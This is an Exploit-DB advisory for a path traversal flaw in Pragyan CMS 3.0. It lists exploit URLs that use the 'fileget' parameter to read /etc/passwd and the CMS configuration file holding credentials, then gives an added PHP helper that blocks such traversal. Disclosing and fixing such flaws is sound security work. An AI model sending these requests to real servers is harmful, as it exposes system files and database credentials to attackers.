Pragyan CMS 3.0 - Remote File Disclosure

EDB-ID: 18347
Platform: PHP
Date: 2012-01-10

Title    : Pragyan CMS v 3.0 => [Remote File Disclosure]
Author   : Or4nG.M4n
Download : http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2

vuln : download.lib.php line 16
vuln : index.php line 234

$_GET['fileget']
 
exploit  http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../  etc/passwd . boot.ini

Download Config file 
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php
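
A defensive counterpart to the `fileget` handling noted above, as an added example (not Pragyan CMS code and not the advisory author's): it canonicalizes the requested name and serves it only if the result still sits under one fixed directory. The helper name `resolve_download()` and the temporary `uploads_demo` directory are hypothetical and constructed for the demo.

```php
<?php
// Added example: hypothetical helper, not taken from Pragyan CMS.
// A caller would pass $_GET['fileget'] as $requested and answer 404 on null.

function resolve_download(string $baseDir, string $requested): ?string
{
    // Reject empty names and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory missing or unreadable
    }

    // realpath() collapses "../" segments and follows symlinks; it returns
    // false when the target does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }

    // The canonical path must still begin with "<base>/". The trailing
    // separator stops "/srv/uploads_evil" from matching "/srv/uploads".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo: a temp directory standing in for the upload folder.
$uploads = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'uploads_demo';
if (!is_dir($uploads)) {
    mkdir($uploads);
}
file_put_contents($uploads . DIRECTORY_SEPARATOR . 'avatar.png', 'demo');

// Constructed inputs: one legitimate name, two that climb out of the base.
foreach (['avatar.png', '../../../../etc/passwd', 'sub/../../avatar.png'] as $name) {
    $path = resolve_download($uploads, $name);
    echo str_pad($name, 26), ' => ',
        $path === null ? 'rejected' : 'served: ' . basename($path), PHP_EOL;
}
```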